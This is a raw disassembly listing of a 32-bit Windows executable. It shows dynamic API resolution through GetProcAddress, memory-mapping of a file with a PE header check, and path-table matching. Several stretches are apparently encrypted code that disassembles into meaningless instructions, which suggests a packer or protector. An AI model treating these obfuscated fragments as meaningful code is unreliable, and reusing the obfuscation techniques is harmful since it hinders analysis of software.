push offset aCreatedibsec_0 ; "CreateDIBSection"
mov edx, [ebp+var_8]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27E4, eax
push offset aDeletedc_0 ; "DeleteDC"
mov eax, [ebp+var_8]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27E8, eax
push offset aRemovefontreso ; "RemoveFontResourceA"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27EC, eax
push offset aBeginpaint ; "BeginPaint"
mov edx, [ebp+var_10]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27F0, eax
push offset aEndpaint ; "EndPaint"
mov eax, [ebp+var_10]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27F4, eax
push offset aGetobjecta ; "GetObjectA"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27F8, eax
push offset aSelectobject_0 ; "SelectObject"
mov edx, [ebp+var_8]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A27FC, eax
push offset aDeleteobject_0 ; "DeleteObject"
mov eax, [ebp+var_8]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2800, eax
push offset aBitblt_0 ; "BitBlt"
mov ecx, [ebp+var_8]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2804, eax
push offset aGetwindowthrea ; "GetWindowThreadProcessId"
mov edx, [ebp+var_10]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2808, eax
push offset aSetactivewindo ; "SetActiveWindow"
mov eax, [ebp+var_10]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A280C, eax
push offset aSetforegroundw ; "SetForegroundWindow"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2810, eax
push offset aRegisterclasse ; "RegisterClassExA"
mov edx, [ebp+var_10]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2814, eax
push offset aGetsystemmetri ; "GetSystemMetrics"
mov eax, [ebp+var_10]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2818, eax
push offset aCreatewindowex ; "CreateWindowExA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A281C, eax
push offset aGetmessagea ; "GetMessageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2820, eax
push offset aTranslatemessa ; "TranslateMessage"
mov eax, [ebp+var_10]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2824, eax
push offset aDispatchmessag ; "DispatchMessageA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2828, eax
push offset aDestroywindo_0 ; "DestroyWindow"
mov edx, [ebp+var_10]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A282C, eax
push offset aEnumwindows ; "EnumWindows"
mov eax, [ebp+var_10]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2830, eax
push offset aDefwindowproca ; "DefWindowProcA"
mov ecx, [ebp+var_10]
push ecx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2834, eax
push offset aPostmessagea ; "PostMessageA"
mov edx, [ebp+var_10]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2838, eax
push offset aCreatethread ; "CreateThread"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A283C, eax
mov [ebp+var_4], offset dword_4A26A4
mov [ebp+var_14], offset dword_4A2840
jmp short loc_48FB7A
; ---------------------------------------------------------------------------
loc_48FB71: ; CODE XREF: sub_48F2E0:loc_48FBA9�j
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
loc_48FB7A: ; CODE XREF: sub_48F2E0+88F�j
mov edx, [ebp+var_4]
cmp edx, [ebp+var_14]
jz short loc_48FBAB
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jnz short loc_48FBA9
push 0
push 0
push 0
mov ecx, [ebp+var_4]
sub ecx, offset dword_4A26A0
sar ecx, 2
sub ecx, 10FFEFFFh
push ecx
call ds:dword_49F00C ; RaiseException
loc_48FBA9: ; CODE XREF: sub_48F2E0+8A8�j
jmp short loc_48FB71
; ---------------------------------------------------------------------------
loc_48FBAB: ; CODE XREF: sub_48F2E0+8A0�j
mov esp, ebp
pop ebp
retn
sub_48F2E0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F298
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFD8h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-24h], 0FFFFFFFFh
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-28h], 0
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+8]
push eax
call ds:dword_4A26A8 ; CreateFileA
mov [ebp-24h], eax
cmp dword ptr [ebp-24h], 0FFFFFFFFh
jz short loc_48FC6C
push 0
mov ecx, [ebp-24h]
push ecx
call ds:dword_4A2700 ; GetFileSize
mov [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], 0FFFFFFFFh
jz short loc_48FC6C
push 0
mov edx, [ebp-1Ch]
push edx
push 0
push 2
push 0
mov eax, [ebp-24h]
push eax
call ds:dword_4A26B0 ; CreateFileMappingA
mov [ebp-20h], eax
cmp dword ptr [ebp-20h], 0
jz short loc_48FC6C
mov ecx, [ebp-1Ch]
push ecx
push 0
push 0
push 4
mov edx, [ebp-20h]
push edx
call ds:dword_4A276C ; MapViewOfFile
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jnz short loc_48FC76
loc_48FC6C: ; CODE XREF: _4:0048FC19�j _4:0048FC2E�j ...
mov ecx, 0EF000001h
call sub_499342
loc_48FC76: ; CODE XREF: _4:0048FC6A�j
mov eax, [ebp-28h]
mov ecx, [ebp-28h]
add ecx, [eax+3Ch]
mov [ebp-30h], ecx
mov edx, [ebp-30h]
cmp dword ptr [edx], 4550h
jz short loc_48FC97
mov ecx, 0EF000002h
call sub_499342
loc_48FC97: ; CODE XREF: _4:0048FC8B�j
mov eax, ds:off_4A269C
mov [ebp-34h], eax
mov ecx, [ebp-30h]
mov edx, [ebp+10h]
sub edx, [ecx+34h]
mov [ebp-2Ch], edx
push 1190000h
call sub_48EB7E
add ds:11417799h, cl ; CODE XREF: _4:0048FCCB�j
stosd
add eax, 1EEE403Fh
sub al, 39h
inc esi
cmp ebx, [eax+1F877A6Dh]
in al, dx
jle short near ptr loc_48FCB5+2
inc ebx
cwde
out dx, al
pop es
xor eax, [ebx+78F72316h]
adc byte ptr [edi+64h], 71h
jle short near ptr loc_48FD3B+2
xchg eax, ecx
db 2Eh
out 77h, eax
dec edi
sbb esp, edi
jp short loc_48FD3B
lds edx, [ecx+4B7AFC62h]
retn
; ---------------------------------------------------------------------------
db 4Eh, 3Fh, 82h
dd 0B61C1F80h, 0E756D0C3h, 1E5B226Fh, 6B46D1A8h, 0EE0CA412h
dd 0D165F518h, 0AB6AFC15h, 0F6588337h, 5A597004h, 1A93DEAh
dd 35E370C2h, 328E108Eh, 0EA5487D7h, 599515B8h, 0DC957533h
dd 2AB9E510h, 0F6E956BFh, 41D55588h
db 0F7h, 6Ch, 0DAh
; ---------------------------------------------------------------------------
loc_48FD3B: ; CODE XREF: _4:0048FCE4�j _4:0048FCDB�j
adc edi, [edi+14D244FBh]
stc
jnz short loc_48FD91
loc_48FD44: ; CODE XREF: _4:0048FD45�j
xchg eax, edi
loop loc_48FD44
rol esi, 1
inc esp
stosb
arpl bx, si
and ebx, [edx+ecx*2+1D4529E4h] ; CODE XREF: _4:0048FDC7�j
out 68h, al
mov esi, 7AF0DD8Eh
mov bl, 0DFh
xchg eax, ebp
jno short loc_48FD9A
jg short loc_48FD80
shr byte ptr [ebx], cl
jg short loc_48FDCE
mov bh, 10h
cmpsd
mov ah, 2Ah
hlt
; ---------------------------------------------------------------------------
dd 693DAD50h, 3BA234CFh, 6A1776DFh, 8E90F8F4h, 59E2CEABh
; ---------------------------------------------------------------------------
loc_48FD80: ; CODE XREF: _4:0048FD60�j
mov ah, [edx+edx*4]
aam 3Bh
stosd
push 7118CCF6h
jle short loc_48FDB7
add eax, eax
push 0FFFFFFC4h
loc_48FD91: ; CODE XREF: _4:0048FD42�j
outsb
loope near ptr loc_48FDEE+3
cmpsb
cmp al, 76h
inc edi
iret
; ---------------------------------------------------------------------------
daa
loc_48FD9A: ; CODE XREF: _4:0048FD5E�j
jge short near ptr loc_48FDC9+1
pop edi
or esi, ebp
aas
jnb short near ptr loc_48FE04+2
db 67h
das
mov bl, 0C0h
and al, 0E9h
sbb [ebx], cl
dec cl
pop esi
aam 35h
inc edx
dec edi
pop esp
loc_48FDB2: ; DATA XREF: _5:0049F2A8�o
and byte ptr [esi+3Bh], 91h
popf
loc_48FDB7: ; CODE XREF: _4:0048FD8B�j
stosb
mov bh, 7
loc_48FDBA: ; DATA XREF: _5:0049F2AC�o
pop edx
mov ebx, 0EE403F03h
pop ds
sub al, 39h
inc esi
loc_48FDC4: ; CODE XREF: _4:0048FDD4�j
cmp edi, [ecx+6Ch]
jp short near ptr loc_48FD4D+3
loc_48FDC9: ; CODE XREF: _4:loc_48FD9A�j
jl short near ptr loc_48FDD6+6
inc ebx
inc esp
aaa
loc_48FDCE: ; CODE XREF: _4:0048FD64�j
nop
nop
xor edx, edx
test edx, edx
jnz short loc_48FDC4
loc_48FDD6: ; CODE XREF: _4:loc_48FDC9�j
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_48FDE4
jmp short loc_48FE15
; =============== S U B R O U T I N E =======================================
sub_48FDE4 proc near ; CODE XREF: _4:0048FDDD�p
; DATA XREF: _5:0049F2A0�o
cmp dword ptr [ebp-28h], 0
jz short loc_48FDF4
mov eax, [ebp-28h]
push eax
loc_48FDEE: ; CODE XREF: _4:0048FD92�j
call ds:dword_4A27A0 ; UnmapViewOfFile
loc_48FDF4: ; CODE XREF: sub_48FDE4+4�j
cmp dword ptr [ebp-20h], 0
jz short loc_48FE04
mov ecx, [ebp-20h]
push ecx
call ds:dword_4A26A4 ; CloseHandle
loc_48FE04: ; CODE XREF: sub_48FDE4+14�j
; _4:0048FDA0�j
cmp dword ptr [ebp-24h], 0
jz short locret_48FE14
mov edx, [ebp-24h]
push edx
call ds:dword_4A26A4 ; CloseHandle
locret_48FE14: ; CODE XREF: sub_48FDE4+24�j
retn
sub_48FDE4 endp
; ---------------------------------------------------------------------------
loc_48FE15: ; CODE XREF: _4:0048FDE2�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F2B0
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFE88h
push ebx
push esi
push edi
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-4], 0
push 105h
call sub_49935A
add esp, 4
mov [ebp-184h], eax
mov eax, [ebp-184h]
mov [ebp-1Ch], eax
push 104h
mov ecx, [ebp-1Ch]
push ecx
push 0
call ds:dword_4A2718 ; GetModuleHandleA
push eax
call ds:dword_4A2714 ; GetModuleFileNameA
mov edx, [ebp+0Ch]
add edx, 82h
mov [ebp-24h], edx
mov eax, [ebp-24h]
mov ecx, [eax]
and ecx, 4
neg ecx
sbb ecx, ecx
neg ecx
mov [ebp-20h], ecx
cmp dword ptr [ebp-20h], 0
jz loc_48FFFE
lea ecx, [ebp-160h]
call sub_498798
mov dword ptr [ebp-164h], 10h
push 290000h
call sub_48EB7E
nop
popf
sub ebp, esi
mov cl, 93h
cmp esi, [ebp-2071CF1Dh]
adc [esi+edx], esp
cmp eax, 7CBB222Fh
push ecx
cmc
dec esp
retn
; ---------------------------------------------------------------------------
db 97h, 0B9h, 0ADh
dd 8ABDEFA0h, 9EAD89FBh, 2913CC7h, 0B285F704h, 96CCFC1Ch
dd 7F09E16h, 414E5A1Bh, 5268559Ah, 0CEE6F301h, 5A4DC906h
dd 0AA81500Fh, 2EF9409Bh, 66792330h, 0F898C230h, 0DBDCAA42h
dd 6D7A86E7h, 0CA3421CFh, 12121F2Ch, 2E21267Bh, 41556C53h
dd 7AA1946Fh, 5A2D4F5Ch, 37742DE4h, 3A4FF67Eh, 345119B4h
dd 65810DFEh, 5D294B58h, 6AF5E8E6h, 36541C2Ch, 95B155ABh
dd 0AD011488h, 0A7053D6Bh, 0EB46731h, 0C4A9AD9Ah, 3BEAABB8h
dd 2A000177h, 11364351h, 0F5037066h, 3E3124E8h, 0F96AB34Bh
dd 59670CFAh, 0DB0D434Ch, 0F081716Eh, 0FFB6D7E4h, 8996A2CFh
dd 2180E38Ch, 212F443Ah, 96907314h, 0CDC6D3E1h, 8593E8D6h
dd 24A5A778h, 1C5D4D32h, 0DDE20310h, 0C1357DA8h, 818FECC2h
dd 8EF4A374h, 0E560C6CBh, 0F2E200F3h, 4E41A771h, 82751533h
dd 5D21748Fh, 90902F3Ch, 0C085C033h
db 75h, 0EEh
; ---------------------------------------------------------------------------
loc_48FFFE: ; CODE XREF: _4:0048FEC0�j
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_49000C
jmp short loc_490025
; =============== S U B R O U T I N E =======================================
sub_49000C proc near ; CODE XREF: _4:00490005�p
; DATA XREF: _5:0049F2B8�o
mov ecx, [ebp-1Ch]
mov [ebp-188h], ecx
mov edx, [ebp-188h]
push edx
call sub_4993DD
add esp, 4
retn
sub_49000C endp
; ---------------------------------------------------------------------------
loc_490025: ; CODE XREF: _4:0049000A�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_490036 proc near ; CODE XREF: sub_49C1EA+1F�p
var_38 = dword ptr -38h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00490153 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F2C0
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
loc_49005B: ; DATA XREF: _2:off_427B6C�o
or [ebp+var_1C], 0FFFFFFFFh
push 0
lea eax, [ebp+var_1C]
push eax
push 3
push 80000000h
push [ebp+arg_0]
call sub_491346
test eax, eax
jz loc_490153
cmp [ebp+var_1C], 0FFFFFFFFh
jz loc_490153
mov eax, ds:dword_4A28E4
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4900A7
mov eax, [ebp+var_2C]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_30], 1
jmp short loc_4900AB
; ---------------------------------------------------------------------------
loc_4900A7: ; CODE XREF: sub_490036+5C�j
and [ebp+var_30], 0
loc_4900AB: ; CODE XREF: sub_490036+6F�j
movzx eax, [ebp+var_30]
test eax, eax
jz loc_490153
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_1C]
mov ecx, ds:dword_4A28E4
call sub_49C871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_490120
push [ebp+var_1C]
call sub_496456
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
cmp [ebp+var_20], 0
jnz short loc_4900FF
push ds:off_49F4F8
push 1Fh
push ds:off_49F4FC
call sub_49948C
loc_4900FF: ; CODE XREF: sub_490036+B4�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov [ebp+var_24], eax
push 0FFFFFFFFh
mov [ebp+var_38], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp short loc_490155
; ---------------------------------------------------------------------------
loc_490120: ; CODE XREF: sub_490036+A0�j
or [ebp+var_4], 0FFFFFFFFh
call sub_49012B
jmp short loc_490153
sub_490036 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_49012B proc near ; CODE XREF: sub_490036+EE�p
; DATA XREF: _5:0049F2C8�o
mov eax, ds:dword_4A28E4
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short loc_490146
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
loc_490146: ; CODE XREF: sub_49012B+C�j
lea eax, [ebp-28h]
push eax
push dword ptr [ebp-1Ch]
call sub_491741
retn
sub_49012B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_490036
loc_490153: ; CODE XREF: sub_490036+40�j
; sub_490036+4A�j ...
xor eax, eax
loc_490155: ; CODE XREF: sub_490036+E8�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_490036
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_490166 proc near ; CODE XREF: sub_490252+1B5�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
cmp [ebp+arg_4], 0
jz short loc_490187
mov ecx, [ebp+arg_4]
mov edi, [ebp+arg_8]
mov esi, [ebp+arg_0]
xor eax, eax
repe cmpsb
jnz loc_49024A
loc_490187: ; CODE XREF: sub_490166+C�j
push 5Ch
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
push eax
call sub_48D640
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_490216
mov eax, [ebp+arg_C]
mov byte ptr [eax], 1
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
inc eax
cmp eax, 80h
jbe short loc_4901C6
xor eax, eax
jmp loc_49024C
; ---------------------------------------------------------------------------
loc_4901C6: ; CODE XREF: sub_490166+57�j
mov ecx, [ebp+var_C]
mov esi, [ebp+arg_8]
add esi, [ebp+arg_4]
mov edi, offset byte_4A2844
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_C]
and ds:byte_4A2844[eax], 0
mov eax, [ebp+arg_10]
mov dword ptr [eax], offset byte_4A2844
push offset byte_4A2844
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_48D06B
pop ecx
pop ecx
neg eax
sbb eax, eax
neg eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
jmp short loc_49024C
; ---------------------------------------------------------------------------
loc_490216: ; CODE XREF: sub_490166+38�j
mov eax, [ebp+arg_C]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_48D06B
pop ecx
pop ecx
neg eax
sbb eax, eax
neg eax
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
mov ecx, [ebp+arg_10]
mov [ecx], eax
mov eax, [ebp+var_10]
jmp short loc_49024C
; ---------------------------------------------------------------------------
loc_49024A: ; CODE XREF: sub_490166+1B�j
xor eax, eax
loc_49024C: ; CODE XREF: sub_490166+5B�j
; sub_490166+AE�j ...
pop edi
pop esi
leave
retn 14h
sub_490166 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_490252 proc near ; CODE XREF: sub_49063E+56�p
; sub_4906DE+90�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0049062B SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F2D0
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 44h
push ebx
push esi
push edi
push offset dword_4A28C8
call ds:dword_4A26C4 ; RtlEnterCriticalSection
and [ebp+var_4], 0
cmp ds:dword_4A2908, 0
jnz short loc_4902A8
push 0FFFFFFFFh
and [ebp+var_4C], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_4C]
jmp loc_49062D
; ---------------------------------------------------------------------------
loc_4902A8: ; CODE XREF: sub_490252+3B�j
and [ebp+var_24], 0
lea eax, [ebp+var_24]
push eax
mov eax, ds:dword_4A2908
add eax, 810h
push eax
push 104h
push [ebp+arg_0]
call ds:dword_4A2708 ; GetFullPathNameA
mov [ebp+var_28], eax
push [ebp+var_28]
mov eax, ds:dword_4A2908
add eax, 810h
push eax
call ds:dword_4A27C8 ; CharUpperBuffA
mov ecx, [ebp+var_28]
call sub_492470
mov eax, ds:dword_4A2908
mov eax, [eax+0Ch]
mov [ebp+var_20], eax
and [ebp+var_1C], 0
and [ebp+var_2C], 0
and [ebp+var_30], 0
mov eax, ds:dword_4A2908
mov ecx, [eax+0C14h]
mov edi, ds:dword_4A2908
add edi, 10h
mov esi, ds:dword_4A2908
add esi, 810h
xor eax, eax
repe cmpsb
jnz loc_490614
mov eax, ds:dword_4A2908
mov eax, [eax+0C14h]
mov ecx, ds:dword_4A2908
lea eax, [ecx+eax+810h]
mov [ebp+var_3C], eax
and [ebp+var_38], 0
push 5Ch
push [ebp+var_3C]
call sub_48D700
pop ecx
pop ecx
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jz short loc_490369
mov eax, [ebp+var_34]
sub eax, [ebp+var_3C]
inc eax
mov [ebp+var_38], eax
jmp short loc_490395
; ---------------------------------------------------------------------------
loc_490369: ; CODE XREF: sub_490252+109�j
mov eax, ds:dword_4A2684
mov eax, [eax+24h]
and eax, 20h
test eax, eax
jnz short loc_490391
push 0FFFFFFFFh
and [ebp+var_50], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_50]
jmp loc_49062D
; ---------------------------------------------------------------------------
loc_490391: ; CODE XREF: sub_490252+124�j
and [ebp+var_38], 0
loc_490395: ; CODE XREF: sub_490252+115�j
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
test ecx, ecx
jnz short loc_4903B1
cmp [ebp+arg_8], 0
jnz short loc_4903B1
jmp loc_4905EB
; ---------------------------------------------------------------------------
loc_4903B1: ; CODE XREF: sub_490252+152�j
; sub_490252+158�j
cmp [ebp+arg_8], 0
jz short loc_4903D4
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 0
jz short loc_4903D4
mov eax, [ebp+arg_8]
mov ecx, ds:dword_4A2908
mov eax, [eax]
sub eax, [ecx+8]
sar eax, 4
inc eax
mov [ebp+var_1C], eax
loc_4903D4: ; CODE XREF: sub_490252+163�j
; sub_490252+16B�j
jmp short loc_4903DD
; ---------------------------------------------------------------------------
loc_4903D6: ; CODE XREF: sub_490252:loc_490412�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4903DD: ; CODE XREF: sub_490252:loc_4903D4�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnb short loc_490414
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_4A2908
mov ecx, [ecx+8]
mov eax, [ecx+eax]
push dword ptr [eax]
push [ebp+var_38]
push [ebp+var_3C]
call sub_490166
test eax, eax
jz short loc_490412
jmp short loc_490414
; ---------------------------------------------------------------------------
loc_490412: ; CODE XREF: sub_490252+1BC�j
jmp short loc_4903D6
; ---------------------------------------------------------------------------
loc_490414: ; CODE XREF: sub_490252+191�j
; sub_490252+1BE�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnb loc_4905EB
mov edi, [ebp+var_2C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_48], ecx
movzx eax, [ebp+var_30]
test eax, eax
jz short loc_4904AC
jmp short loc_490441
; ---------------------------------------------------------------------------
loc_49043A: ; CODE XREF: sub_490252:loc_4904AA�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_490441: ; CODE XREF: sub_490252+1E6�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_1C], eax
jnb short loc_4904AC
mov eax, [ebp+var_1C]
inc eax
shl eax, 4
mov ecx, ds:dword_4A2908
mov ecx, [ecx+8]
mov eax, [ecx+eax]
mov edi, [eax]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_48]
add eax, [ebp+var_38]
cmp ecx, eax
jb short loc_4904A8
mov ecx, [ebp+var_48]
add ecx, [ebp+var_38]
mov eax, [ebp+var_1C]
shl eax, 4
mov edx, ds:dword_4A2908
mov edx, [edx+8]
mov eax, [edx+eax]
mov edi, [eax]
mov eax, [ebp+var_1C]
inc eax
shl eax, 4
mov edx, ds:dword_4A2908
mov edx, [edx+8]
mov eax, [edx+eax]
mov esi, [eax]
xor eax, eax
repe cmpsb
jz short loc_4904AA
loc_4904A8: ; CODE XREF: sub_490252+21F�j
jmp short loc_4904AC
; ---------------------------------------------------------------------------
loc_4904AA: ; CODE XREF: sub_490252+254�j
jmp short loc_49043A
; ---------------------------------------------------------------------------
loc_4904AC: ; CODE XREF: sub_490252+1E4�j
; sub_490252+1F6�j ...
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_4A2908
mov ecx, [ecx+8]
mov eax, [ecx+eax+4]
add eax, [ebp+var_38]
mov [ebp+var_2C], eax
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_4A2908
mov ecx, [ecx+8]
add ecx, eax
mov [ebp+var_40], ecx
mov eax, [ebp+var_40]
mov eax, [eax]
mov [ebp+var_44], eax
xor eax, eax
mov edi, [ebp+arg_4]
stosd
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+arg_4]
add edi, 2Ch
rep stosd
cmp [ebp+var_48], 104h
jnb short loc_490505
mov eax, [ebp+var_48]
mov [ebp+var_54], eax
jmp short loc_49050C
; ---------------------------------------------------------------------------
loc_490505: ; CODE XREF: sub_490252+2A9�j
mov [ebp+var_54], 104h
loc_49050C: ; CODE XREF: sub_490252+2B1�j
mov ecx, [ebp+var_54]
mov esi, [ebp+var_2C]
mov edi, [ebp+arg_4]
add edi, 2Ch
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov edi, [ebp+arg_4]
add edi, 130h
stosd
stosd
stosd
stosw
cmp [ebp+var_48], 0Eh
jbe short loc_490545
mov [ebp+var_58], 0Eh
jmp short loc_49054B
; ---------------------------------------------------------------------------
loc_490545: ; CODE XREF: sub_490252+2E8�j
mov eax, [ebp+var_48]
mov [ebp+var_58], eax
loc_49054B: ; CODE XREF: sub_490252+2F1�j
mov ecx, [ebp+var_58]
mov esi, [ebp+var_2C]
mov edi, [ebp+arg_4]
add edi, 130h
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
movzx eax, [ebp+var_30]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_44]
mov ecx, [ecx+8]
mov [eax+20h], ecx
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+4], edx
mov eax, [eax+20h]
mov [ecx+8], eax
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+0Ch], edx
mov eax, [eax+20h]
mov [ecx+10h], eax
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+14h], edx
mov eax, [eax+20h]
mov [ecx+18h], eax
cmp [ebp+arg_8], 0
jz short loc_4905D2
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_40]
mov [eax], ecx
loc_4905D2: ; CODE XREF: sub_490252+376�j
push 0FFFFFFFFh
mov [ebp+var_5C], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
